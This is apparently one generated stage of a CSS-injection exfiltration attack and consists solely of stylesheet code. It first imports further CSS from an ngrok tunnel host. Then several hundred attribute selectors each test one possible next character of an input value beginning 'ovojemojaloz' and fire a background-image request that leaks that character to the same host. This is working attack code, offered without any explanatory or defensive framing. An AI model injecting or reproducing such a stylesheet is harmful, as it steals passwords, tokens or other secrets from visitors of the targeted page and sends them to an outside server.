@import url("http://bc0a37bcf1d5.ngrok.io/?l=14");
input[value="ovojemojaloz!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.3961200658958841");}
input[value="ovojemojaloz\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.18490899920969284");}
input[value="ovojemojaloz#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.15467916437599483");}
input[value="ovojemojaloz$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.9786061063685001");}
input[value="ovojemojaloz%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.9488880480366513");}
input[value="ovojemojaloz&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.8915283762341228");}
input[value="ovojemojaloz'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.7787612606326952");}
input[value="ovojemojaloz("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.5304840614950972");}
input[value="ovojemojaloz)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.43726964326095175");}
input[value="ovojemojaloz*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.1653237038397135");}
input[value="ovojemojaloz+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.7687638651104516");}
input[value="ovojemojaloz,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.002342957599001938");}
input[value="ovojemojaloz-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.8418239824533509");}
input[value="ovojemojaloz."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.836052179885457");}
input[value="ovojemojaloz/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.7852722013505515");}
input[value="ovojemojaloz0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.2506985761512954");}
input[value="ovojemojaloz1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.5015006022998545");}
input[value="ovojemojaloz2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.9659056977776905");}
input[value="ovojemojaloz3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.7356766206991321");}
input[value="ovojemojaloz4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.11932083120878212");}
input[value="ovojemojaloz5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.26007340835283266");}
input[value="ovojemojaloz6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.7510427064009526");}
input[value="ovojemojaloz7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.39878655357961");}
input[value="ovojemojaloz8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.09921463459445468");}
input[value="ovojemojaloz9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.006948164842188076");}
input[value="ovojemojaloz:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.15198084596161676");}
input[value="ovojemojaloz;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.29478192646855117");}
input[value="ovojemojaloz<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.2964524887832263");}
input[value="ovojemojaloz="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.09683234339892666");}
input[value="ovojemojaloz>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.4837166446605643");}
input[value="ovojemojaloz?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.6788737466429187");}
input[value="ovojemojaloz@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.4372870061607135");}
input[value="ovojemojalozA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.01900312077494748");}
input[value="ovojemojalozB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.152304582130949");}
input[value="ovojemojalozC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.39830252957803336");}
input[value="ovojemojalozD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.5789501946542037");}
input[value="ovojemojalozE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.5992796033847916");}
input[value="ovojemojalozF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.856248896714749");}
input[value="ovojemojalozG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.34921420571882966");}
input[value="ovojemojalozH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.7705273965926482");}
input[value="ovojemojalozI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.48034584055677154");}
input[value="ovojemojalozJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.6184535160810365");}
input[value="ovojemojalozK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.8655402959639094");}
input[value="ovojemojalozL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.3343125766644932");}
input[value="ovojemojalozM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.45109487771815315");}
input[value="ovojemojalozN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.6737412873162429");}
input[value="ovojemojalozO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.3495800612963278");}
input[value="ovojemojalozP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.697518228086845");}
input[value="ovojemojalozQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.5596352398561484");}
input[value="ovojemojalozR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.3353905249792899");}
input[value="ovojemojalozS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.4640806237232338");}
input[value="ovojemojalozT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.8301411536260046");}
input[value="ovojemojalozU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.23557205677317783");}
input[value="ovojemojalozV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.008442804226882039");}
input[value="ovojemojalozW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.4674005721679244");}
input[value="ovojemojalozX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.895707555908998");}
input[value="ovojemojalozY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.22660678062926287");}
input[value="ovojemojalozZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.5366509492721858");}
input[value="ovojemojaloz["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.13823821245725254");}
input[value="ovojemojaloz\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.5296536751161416");}
input[value="ovojemojaloz]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.17137977907513235");}
input[value="ovojemojaloz^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.7717885246796032");}
input[value="ovojemojaloz_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.013454024886490057");}
input[value="ovojemojaloz`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.6250373811379797");}
input[value="ovojemojaloza"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.0026213378220885097");}
input[value="ovojemojalozb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.980792810388688");}
input[value="ovojemojalozc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.2325385530188231");}
input[value="ovojemojalozd"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.7662398200464537");}
input[value="ovojemojaloze"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.14616863376547884");}
input[value="ovojemojalozf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.42681022905754107");}
input[value="ovojemojalozg"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.3666800314426457");}
input[value="ovojemojalozh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.014317651268476395");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.4087759572076122");}
input[value="ovojemojalozj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.6297257266100516");}
input[value="ovojemojalozk"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.7139061089942076");}
input[value="ovojemojalozl"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.8976534211186364");}
input[value="ovojemojalozm"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.8397218184926067");}
input[value="ovojemojalozn"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.931816102418553");}
input[value="ovojemojalozo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.0687143801718395");}
input[value="ovojemojalozp"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.6745206144315343");}
input[value="ovojemojalozq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.5773851851700931");}
input[value="ovojemojalozr"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.15627053311303474");}
input[value="ovojemojalozs"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.29907652458620837");}
input[value="ovojemojalozt"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.693360157479505");}
input[value="ovojemojalozu"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.9168639761415671");}
input[value="ovojemojalozv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.8854274184147652");}
input[value="ovojemojalozw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.3107910346745637");}
input[value="ovojemojalozx"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.22893568442445011");}
input[value="ovojemojalozy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.2885365921729641");}
input[value="ovojemojalozz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.7600293791800818");}
input[value="ovojemojaloz{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.632772078792516");}
input[value="ovojemojaloz|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.703278178806598");}
input[value="ovojemojaloz}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.4186523168000713");}
input[value="ovojemojaloz~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.838002784670201");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.18821808468166235");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.003106261965324375");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7324228351233844");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7750712586883775");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6478633718322813");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5114650319797718");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8744004964585423");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4613088487549011");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.35229948457378746");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8363974453645289");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.48295604883154564");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.04751651391655609");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.762069204559886");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2146506923055902");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4364053145592275");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.05927540913337426");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6397720090238412");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.45632691735865194");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9427026392573963");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6111446791577717");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7781997780567949");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.239428394257704");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9720723052826794");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6882650990434189");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7274662399642642");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.17402015667308235");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6536426107083422");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9945641040468116");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5365928191503095");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.27346220475736516");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.44127222334843785");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9314879455434277");}
input[value="ovojemojaloz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3090597560761801");}
input[value="ovojemojaloz "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.05980315061878905");}
input[value="ovojemojaloz¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.9541899190590748");}
input[value="ovojemojaloz¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.3473960799918281");}
input[value="ovojemojaloz£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.927354040908057");}
input[value="ovojemojaloz¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.10735363941186282");}
input[value="ovojemojaloz¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.1254984529353187");}
input[value="ovojemojaloz¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.2954140556920195");}
input[value="ovojemojaloz§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.28857909166674545");}
input[value="ovojemojaloz¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.9482994752151661");}
input[value="ovojemojaloz©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.13163821629952288");}
input[value="ovojemojalozª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.1659130202895347");}
input[value="ovojemojaloz«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.7426741404847681");}
input[value="ovojemojaloz¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.10610490886061741");}
input[value="ovojemojaloz­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.9156157338519748");}
input[value="ovojemojaloz®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.9930647385744567");}
input[value="ovojemojaloz¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.4870627709199067");}
input[value="ovojemojaloz°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.09803895116557904");}
input[value="ovojemojaloz±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.5760844894929698");}
input[value="ovojemojaloz²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.62481786098663");}
input[value="ovojemojaloz³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.17454851875706057");}
input[value="ovojemojaloz´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.2675284974057428");}
input[value="ovojemojalozµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.32764557293356344");}
input[value="ovojemojaloz¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.24044730550681215");}
input[value="ovojemojaloz·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.7440555897264216");}
input[value="ovojemojaloz¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.9361732300887486");}
input[value="ovojemojaloz¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.07151868464928679");}
input[value="ovojemojalozº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.6304361362032427");}
input[value="ovojemojaloz»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.2015233467743418");}
input[value="ovojemojaloz¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.1492711814265022");}
input[value="ovojemojaloz½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.5314660456620806");}
input[value="ovojemojaloz¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.26873444018556336");}
input[value="ovojemojaloz¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.035040282537816214");}
input[value="ovojemojalozÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.618211279422364");}
input[value="ovojemojalozÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.047950182240783956");}
input[value="ovojemojalozÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.892695117840965");}
input[value="ovojemojalozÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.7258214175429747");}
input[value="ovojemojalozÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.9562874281940488");}
input[value="ovojemojalozÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.3515492519254926");}
input[value="ovojemojalozÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.09363487961979589");}
input[value="ovojemojalozÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.9842142130857783");}
input[value="ovojemojalozÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.01986549926261061");}
input[value="ovojemojalozÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.9099413328276102");}
input[value="ovojemojalozÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.9223195199292116");}
input[value="ovojemojalozË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.4670321241208748");}
input[value="ovojemojalozÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.4018906493455996");}
input[value="ovojemojalozÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.6505364432662901");}
input[value="ovojemojalozÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.5476890837533355");}
input[value="ovojemojalozÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.6812387437502039");}
input[value="ovojemojalozÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.9829873550291506");}
input[value="ovojemojalozÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.8204996020504238");}
input[value="ovojemojalozÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.1237126139677509");}
input[value="ovojemojalozÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.0329770806948988");}
input[value="ovojemojalozÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.9045957318180124");}
input[value="ovojemojalozÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.05458267460241073");}
input[value="ovojemojalozÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.029266221093505074");}
input[value="ovojemojaloz×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.6501533163943454");}
input[value="ovojemojalozØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.609351288011095");}
input[value="ovojemojalozÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.05486000619322495");}
input[value="ovojemojalozÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.7906850227442763");}
input[value="ovojemojalozÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.9340499983369017");}
input[value="ovojemojalozÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.6407567855066674");}
input[value="ovojemojalozÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.6441324881325392");}
input[value="ovojemojalozÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.5949745570507607");}
input[value="ovojemojalozß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.8288764807538886");}
input[value="ovojemojalozà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.3965479422906584");}
input[value="ovojemojalozá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.2996728782174458");}
input[value="ovojemojalozâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.4565122777824715");}
input[value="ovojemojalozã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.04278244249729224");}
input[value="ovojemojalozä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.07295554570518314");}
input[value="ovojemojalozå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.05873393654142167");}
input[value="ovojemojalozæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.8444875815108208");}
input[value="ovojemojalozç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.02615108773075181");}
input[value="ovojemojalozè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.5877357238252936");}
input[value="ovojemojalozé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.8773386823256581");}
input[value="ovojemojalozê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.3117183441046618");}
input[value="ovojemojalozë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.7400318651851217");}
input[value="ovojemojalozì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.8438033379439407");}
input[value="ovojemojalozí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.14553058338314684");}
input[value="ovojemojalozî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.6969839778551741");}
input[value="ovojemojalozï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.8618950011589259");}
input[value="ovojemojalozð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.32458390429759065");}
input[value="ovojemojalozñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.08778767348938255");}
input[value="ovojemojalozò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.3105370449228402");}
input[value="ovojemojalozó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.15326287664737026");}
input[value="ovojemojalozô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.9842543808170725");}
input[value="ovojemojalozõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.21795649785256965");}
input[value="ovojemojalozö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.6198153653850791");}
input[value="ovojemojaloz÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.3080600702089278");}
input[value="ovojemojalozø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.8685436464419669");}
input[value="ovojemojalozù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.29332420196410913");}
input[value="ovojemojalozú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.5140501160867019");}
input[value="ovojemojalozû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.6412298310537665");}
input[value="ovojemojalozü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.5600017828838737");}
input[value="ovojemojalozý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.6852480566657533");}
input[value="ovojemojalozþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.10501337090243701");}
input[value="ovojemojalozÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.621420871178521");}
